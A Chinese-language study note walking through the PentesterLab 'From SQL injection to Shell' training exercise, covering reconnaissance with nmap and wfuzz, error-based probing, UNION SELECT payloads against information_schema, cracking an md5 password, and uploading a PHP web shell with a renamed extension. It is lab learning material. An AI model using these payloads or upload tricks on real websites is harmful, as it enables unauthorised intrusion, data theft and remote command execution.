[SQL注入1]From SQL injection to Shell

第一次写，希望大神们多指点。

对于刚接触WEB渗透测试这块的朋友们，很希望能有个平台可以练习。网络上有不少，十大渗透测试演练系统，我这里推荐一个在10以外，适合初学者一步一步进步的平台PENTESTERLAB，网址如下：http://www.pentesterlab.com/

刚开始学，我碰到很多困难，如对数据库不够熟悉，对PHP不熟悉，对各种大神的工具不熟悉。积沙成塔，滴水穿石，我们一步一步踏实地学，可能也用不了多久，就深入这行了。

不废话了，进入正题。

From SQL injection to Shell 这关，大家先网上去下载平台和说明书，本文是我学习过程的笔记，基本上是翻译版的说明书，网上没找到多少这个平台的答案，让大神们遗笑大方。

新手最好自己先练习，官网上讲学习者自己研究，答案只会让你进步变慢。

http://www.pentesterlab.com/exercises/from_sqli_to_shell/

第一步：查找指纹(指纹是信息，可以用于之后的攻击)

1.nmap 端口

2.telnet

3.fiddles或brupsuit查看request headers和服务器的response

HTTP/1.1 200 OK

Date: Thu, 24 Nov 2011 04:40:51 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.3-7+squeeze3

Vary: Accept-Encoding

Content-Length: 1335

Content-Type: text/html

4.目录内容暴力嗅探 wfuzz

试出指定目录下存在的文件

wfuzz.py -z  file -f  commons.txt  --hc  404 http://vulnerable/FUZZ.php

第二步：嗅探和开发SQL注入

1.嗅探：

猜想服务器上脚本

整型参数试探

/article.php?id=2'  如果报错语法错误，说明存在漏洞(从SQL的语法来看，不难理解)

/article.php?id=2-1 不报错，如果显示是1图则存在漏洞

字符型参数试探

如果加1个  '   将报错

如果加两个'  不报错

也可以使用'--来试探   这个是备注符

如果参数位于是在SQL语句内部，

可以用 ' and '1'='1 来试探

再用 ' and '1'='0 来试探，可能报错，也可能查询得其它结果

2.开发SQL注入漏洞

使用UNION

UNION是将两个查询语句的结果合并起来。UNION连接的两个查询结果。

下面简单介绍一下UNION功能

如下两表

要找出来所有有营业额 (sales) 的日子

SELECT Date FROM Store_Information

UNION

SELECT Date FROM Internet_Sales

结果：

查询语句的前面部分我们无法修改，因为这些是PHP中的代码。然而，我们可以利用UNION尝试其它表格的信息。

一个重要的规则，UNION连接的两个查询语句必须查询相等数量的列，否则将出错。

3.利用UNION开发

a.利用UNION试探出列的数量

b.找出显示的列

c.尝试出数据库meta-tables中的信息

d.尝试出其它数据库或表中的信息

有两种方法可以试出列的数量

         使用UNION SELECT 和增加列的数量

         使用ORDER BY

例源语句如下：

SELECT id,name,price FROM articles where id=1

         尝试   SELECT id,name,price FROM articles where id=1 UNION SELECT 1

将报错

         尝试    SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2

将报错

         尝试   SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3

没有报错

注：这个是MYSQL方法理论，与其它数据库可能不同。1,2,3……可以换成null,null,null……，UNION两端的字段类型需要一致（或兼容）。

另一种方法是ODER BY

利用ORDER BY，我们可试出字段名。

还有，我们可以用数字，

如果数字大于列数，将报错。例如10

由上面的结果，我们可以构建如下

4.试信息

利用MYSQL自带的函数current_user(),version()和database()

构建如下：

http://www.vulnerable.com/cat.php?id=1%20union%20select%201,@@version,3,4

http://www.vulnerable.com/cat.php?id=1%20union%20select%201,version%28%29,3,4

我们查到MYSQL的版本号

MYSQL5.0以后包含数据库information_schema，我可利用它个数据 库构建语句。

         1 UNION SELECT 1,table_name,3,4 FROM

information_schema.tables

         1 UNION SELECT 1,column_name,3,4 FROM

information_schema.columns

         1 UNION SELECT 1, table_name, column_name,4 FROM

information_schema.columns

         1 UNION SELECT  1,concat(table_name,':', column_name),3,4 FROM

information_schema.columns

比较上面几个语句，后面一个使查询结果变得更直观。可以清楚地知道information_schema数据库中表与字段。我们发现其中有个user表，构建语句

查询结果出来了，好激动。

密码是md5加密，可以google，找解密网站。也可以用john工具进行破解。

破解出来密码是：P4ssw0rd

第三步：登陆网站注入代码

用账号密码登陆网站，找到上传文件位置，上传一个php脚本，

如shell.php，内容如下：

上传报错，可能是对文件扩展名进行了过滤。把扩散名改成php3试试，如果还是不行，再试其它的。

上传完了，接下来就是确定shell.php3的路径。这可以查看图片的HTML代码中查找到

接下来，构建试下命令uname

这里所能执行的命令与应用的权限有关系，如果应用安装时是管理员账号，攻击者会获取到管理员的权限。

出于安全，应用应在普通用户下安装，并给该用户尽可能低的权限。

谢谢大家读完，欢迎大家交流。